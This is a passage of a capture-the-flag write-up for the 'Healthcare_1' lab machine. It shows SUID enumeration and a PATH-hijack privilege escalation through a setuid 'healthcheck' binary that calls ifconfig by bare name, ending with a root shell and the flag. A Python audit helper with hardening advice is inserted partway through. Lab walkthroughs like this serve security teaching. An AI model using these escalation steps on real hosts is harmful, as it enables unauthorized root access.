137222 36 -rwsr-xr-x 1 root root 35128 Nov 28 2010 /usr/bin/ping6
136351 12 -rws--x--x 1 root root 11664 Nov 16 2010 /usr/bin/chsh
172 308 -rwsr-x--- 1 root messagebus 314400 Sep 29 2011 /lib/dbus-1/dbus-daemon-launch-helper
136122 12 -rwsr-xr-x 1 root root 11114 Jul 6 2011 /sbin/pam_timestamp_check
123 36 -rwsr-xr-x 1 root root 34848 Nov 28 2010 /bin/ping
83 28 -rwsr-xr-x 1 root root 26360 Oct 18 2011 /bin/fusermount
144 32 -rwsr-xr-x 1 root root 31144 Nov 16 2010 /bin/su
111 80 -rwsr-xr-x 1 root root 80748 Nov 16 2010 /bin/mount
152 32 -rwsr-xr-x 1 root root 31180 Nov 16 2010 /bin/umount

An interesting file stands out: /usr/bin/healthcheck.

Check its permissions.

[medical@localhost default]$ ls -liah /usr/bin/healthcheck
ls -liah /usr/bin/healthcheck
132151 -rwsr-sr-x 1 root root 5.7K Jul 29 2020 /usr/bin/healthcheck

It cannot be modified; look at its readable strings.

[medical@localhost default]$ strings /usr/bin/healthcheck
strings /usr/bin/healthcheck
/lib/ld-linux.so.2
__gmon_start__
libc.so.6
_IO_stdin_used
setuid
system
setgid
__libc_start_main
GLIBC_2.0
PTRhp
[^_]
clear ; echo 'System Health Check' ; echo '' ; echo 'Scanning System' ; sleep 2 ; ifconfig ; fdisk -l ; du -h

ifconfig is not called with an absolute path, so try privilege escalation via the PATH environment variable.

[medical@localhost default]$ echo $PATH
echo $PATH
/sbin:/usr/sbin:/bin:/usr/bin:/usr/lib/qt4/bin
[medical@localhost default]$ cd /tmp
cd /tmp
[medical@localhost tmp]$ export PATH=.:$PATH
export PATH=.:$PATH
[medical@localhost tmp]$ echo $PATH
echo $PATH
.:/sbin:/usr/sbin:/bin:/usr/bin:/usr/lib/qt4/bin
[medical@localhost tmp]$ echo "/bin/bash" > ifconfig
echo "/bin/bash" > ifconfig
[medical@localhost tmp]$ chmod +x ifconfig
chmod +x ifconfig
[medical@localhost tmp]$ ls -laih
ls -laih
total 3.7M
393986 drwxrwxrwt 6 root root 4.0K Aug 12 16:23 ./
2 drwxr-xr-x 21 root root 4.0K Aug 11 18:28 ../
417152 drwxrwxrwt 2 root root 4.0K Aug 11 18:28 .ICE-unix/
420761 -r--r--r-- 1 root root 11 Aug 11 18:28 .X0-lock
420762 drwxrwxrwt 2 root root 4.0K Aug 11 18:28 .X11-unix/
424825 -rw-r--r-- 1 root root 1.7K Aug 11 18:28 ddebug.log
424987 drwx------ 2 medical medical 4.0K Aug 12 15:52 gpg-1hljcK/
423301 drwx------ 2 almirant almirant 4.0K Jul 29 2020 gpg-ycbRQr/
428578 -rwxr-xr-x 1 medical medical 10 Aug 12 16:23 ifconfig*
425007 -rw------- 1 root root 0 Jul 29 2020 init.vQ5ZLd
428666 -rw-r--r-- 1 apache apache 3.7M Jul 29 2020 setup_dump.sql
[medical@localhost tmp]$ /usr/bin/healthcheck
/usr/bin/healthcheck
TERM environment variable not set.
System Health Check

Scanning System
[root@localhost tmp]#

Privilege escalation succeeded.
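An added audit helper (not code from the original writeup) for the two conditions the healthcheck escalation above depends on: a setuid binary shelling out to programs by bare name, and a PATH the invoking user can steer. It also produces the hardened form of the command string with every program pinned to an absolute path. The command string and PATH values are constructed from the page's output; the install locations in ASSUMED_LOCATIONS are assumptions.

```python
"""Audit the SUID + system() + PATH pattern seen in /usr/bin/healthcheck.

Checks: (1) which programs in a system() string the shell resolves through PATH,
(2) which PATH entries are attacker-steerable, (3) whether both hold at once,
and (4) what the command string looks like once every program is pinned.
"""
import re

# Constructed to match the string recovered by `strings /usr/bin/healthcheck` above.
HEALTHCHECK_CMD = ("clear ; echo 'System Health Check' ; echo '' ; "
                   "echo 'Scanning System' ; sleep 2 ; ifconfig ; fdisk -l ; du -h")

# POSIX sh builtins run inside the shell and are never searched for in PATH.
SH_BUILTINS = frozenset({"echo", "printf", "cd", "pwd", "export", "unset", "set",
                         "read", "test", "[", ":", "true", "false", "eval",
                         "exec", "exit", "umask", "ulimit", "trap", "wait"})

_SEP = re.compile(r"(\s*(?:;|&&|\|\||\||\n)\s*)")   # capture group keeps separators
_ASSIGN = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")     # leading VAR=value words


def _program_span(simple_cmd):
    """Locate the program word of one simple command: the first whitespace-separated
    token that is not a leading VAR=value assignment. Returns (start, end) or None."""
    for m in re.finditer(r"\S+", simple_cmd):
        if _ASSIGN.match(m.group()):
            continue
        return m.start(), m.end()
    return None


def path_resolved_programs(cmdline):
    """Programs in a system() string that the shell must look up through PATH:
    bare names only. Anything containing '/' is a pathname and builtins stay in-shell."""
    found = []
    for piece in _SEP.split(cmdline)[::2]:          # even indices are simple commands
        span = _program_span(piece)
        if span is None:
            continue
        prog = piece[span[0]:span[1]]
        if "/" in prog or prog in SH_BUILTINS or prog in found:
            continue
        found.append(prog)
    return found


def unsafe_path_entries(path_value):
    """PATH entries that let the caller steer the lookup: '.', relative directories,
    and empty entries (a leading, trailing or doubled ':' means the current directory)."""
    return [e or "<empty>" for e in path_value.split(":") if not e.startswith("/")]


def is_hijackable(cmdline, path_value):
    """True when the binary shells out by bare name AND the PATH it inherits contains
    an entry the invoking user controls, which is exactly the combination on this box."""
    return bool(path_resolved_programs(cmdline)) and bool(unsafe_path_entries(path_value))


def pin_programs(cmdline, resolve):
    """Hardened form of the command string: every PATH-resolved program is replaced by
    the absolute path returned by resolve(name). Propagates KeyError if one cannot be
    pinned, because a command line that is only partly pinned is still hijackable."""
    pieces = _SEP.split(cmdline)
    for i in range(0, len(pieces), 2):
        span = _program_span(pieces[i])
        if span is None:
            continue
        prog = pieces[i][span[0]:span[1]]
        if "/" in prog or prog in SH_BUILTINS:
            continue
        pieces[i] = pieces[i][:span[0]] + resolve(prog) + pieces[i][span[1]:]
    return "".join(pieces)


# Assumed install locations for the hardened string. On a real host the resolver
# would run at build/package time, never inside the setuid program at run time.
ASSUMED_LOCATIONS = {"clear": "/usr/bin/clear", "sleep": "/bin/sleep",
                     "ifconfig": "/sbin/ifconfig", "fdisk": "/sbin/fdisk",
                     "du": "/usr/bin/du"}

if __name__ == "__main__":
    tainted = ".:/sbin:/usr/sbin:/bin:/usr/bin:/usr/lib/qt4/bin"   # PATH used on the page
    print("PATH lookups:", path_resolved_programs(HEALTHCHECK_CMD))
    print("unsafe PATH entries:", unsafe_path_entries(tainted))
    print("hijackable:", is_hijackable(HEALTHCHECK_CMD, tainted))
    print("pinned:", pin_programs(HEALTHCHECK_CMD, ASSUMED_LOCATIONS.__getitem__))
```

Pinning paths removes the PATH dependency, but a setuid program that calls system() still inherits every other environment variable, so clearing the environment before the call (or not using system() at all) is the complete fix.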

[root@localhost tmp]# whoami
whoami
root
[root@localhost tmp]# id
id
uid=0(root) gid=0(root) groups=0(root),7(lp),19(floppy),22(cdrom),80(cdwriter),81(audio),82(video),83(dialout),100(users),490(polkituser),500(medical),501(fuse)
[root@localhost tmp]# cd /root
cd /root
[root@localhost root]# ls -alih
ls -alih
total 920K
393987 drwxr-x--- 20 root root 4.0K Jul 29 2020 ./
2 drwxr-xr-x 21 root root 4.0K Aug 11 18:28 ../
411838 -rw------- 1 root root 0 Sep 11 2011 .ICEauthority
428659 -rw------- 1 root root 426 Jul 29 2020 .bash_history
411839 -rw-r--r-- 1 root root 193 Sep 24 2011 .bash_profile
411840 -rw-rw-rw- 1 root root 422 Sep 6 2011 .bashrc
411841 drwxr-xr-x 2 root root 4.0K Sep 12 2011 .cache/
411843 drwx------ 6 root root 4.0K Sep 12 2011 .config/
411855 drwx------ 3 root root 4.0K Jul 19 2011 .dbus/
411858 -rw------- 1 root root 28 Jul 22 2011 .dmrc
411859 drwx------ 4 root root 4.0K Sep 24 2011 .gconf/
411979 drwx------ 2 root root 4.0K Sep 24 2011 .gconfd/
411981 drwx------ 3 root root 4.0K Sep 12 2011 .gnome2/
411983 drwx------ 2 root root 4.0K Sep 12 2011 .gnome2_private/
411835 drwx------ 3 root root 4.0K Jul 29 2020 .gnupg/
411984 drwx------ 2 root root 4.0K Jul 19 2011 .gvfs/
411985 drwx------ 3 root root 4.0K Sep 6 2011 .local/
411995 drwx------ 3 root root 4.0K Nov 5 2011 .mc/
411999 -rw-r--r-- 1 root root 0 Oct 22 2010 .mdk-menu-migrated
412000 -rw-r--r-- 1 root root 0 Jul 21 2011 .menu-updates.stamp
428664 -rw------- 1 root root 6 Jul 29 2020 .mysql_history
412001 drwx------ 2 root root 4.0K Nov 5 2011 .synaptic/
412006 drwx------ 2 root root 4.0K Sep 11 2011 .thumbnails/
412007 drwxr-xr-x 2 root root 4.0K Jul 29 2020 .xauth/
412008 -rw-r--r-- 1 root root 1.9K Jul 6 2011 .xbindkeysrc
412009 drwxr--r-- 2 root root 4.0K Jul 19 2011 Desktop/
412010 drwx------ 3 root root 4.0K Sep 8 2011 Documents/
393989 drwx------ 2 root root 4.0K Sep 6 2011 drakx/
430643 -rwxr-xr-x 1 root root 5.7K Jul 29 2020 healthcheck*
430637 -rw-r--r-- 1 root root 182 Jul 29 2020 healthcheck.c
428662 -rw-rw-rw- 1 root root 2.1K Jul 29 2020 root.txt
430635 -rw-r--r-- 1 root root 797K Apr 12 2020 sudo.rpm
393988 drwx------ 2 root root 4.0K Aug 11 18:28 tmp/
[root@localhost root]# cat root.txt
cat root.txt
██  ██  ██████  ██  ██  ████████ ██████  ██ ███████ ██████  ██  ██  █████  ██████  ██████  ███████ ██████  ██ 
 ██  ██  ██    ██ ██  ██     ██    ██   ██ ██ ██      ██   ██  ██  ██ ██   ██ ██   ██ ██   ██ ██      ██   ██ ██ 
 ████   ██  ██ ██  ██  ██  ██████  ██ █████  ██  ██  ███████ ███████ ██████  ██  ██ █████  ██████  ██ 
 ██   ██  ██ ██  ██  ██  ██   ██ ██ ██     ██  ██  ██   ██ ██   ██ ██   ██ ██  ██ ██     ██   ██    
██   ██████   ██████   ██  ██  ██ ██ ███████ ██████   ██  ██ ██  ██ ██  ██ ██████  ███████ ██  ██ ██ 
                                                                                                 

Thanks for Playing!

Follow me at: http://v1n1v131r4.com


root hash: eaff25eaa9ffc8b62e3dfebf70e83a7b

Healthcare_1 Target Machine
https://i3eg1nner.github.io/2023/08/c7207977b36b.html
Author: I3eg1nner
Published: August 11, 2023
License